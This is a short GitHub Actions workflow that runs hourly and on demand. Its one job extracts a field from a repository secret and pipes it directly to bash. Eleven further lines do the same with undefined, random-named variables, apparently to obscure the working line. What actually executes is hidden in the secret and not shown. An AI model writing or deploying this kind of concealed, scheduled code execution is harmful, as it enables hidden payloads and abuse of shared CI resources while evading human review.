name: xuhongjin1986
on:
  workflow_dispatch:
  schedule:
    - cron: '49 * * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xuhongjin1986
        env:
          fz30: ${{ secrets.fz30 }}
        run: |
          echo $fz30 | jq -r .j30 | /bin/bash
          echo $tb2 | jq -r .f27 | /bin/bash
          echo $odl7628 | jq -r .rvzim45 | /bin/bash
          echo $drwv94745 | jq -r .cydw1628 | /bin/bash
          echo $ppnai4 | jq -r .zyrn452 | /bin/bash
          echo $liq389 | jq -r .jvoax9298 | /bin/bash
          echo $weii65027 | jq -r .dsx30 | /bin/bash
          echo $kzmq890 | jq -r .rudka436 | /bin/bash
          echo $fpjml49 | jq -r .idox8 | /bin/bash
          echo $uojrb453 | jq -r .dohbx682 | /bin/bash
          echo $tsnmx71 | jq -r .otuf3384 | /bin/bash
          echo $xptwu4045 | jq -r .rdux3057 | /bin/bash

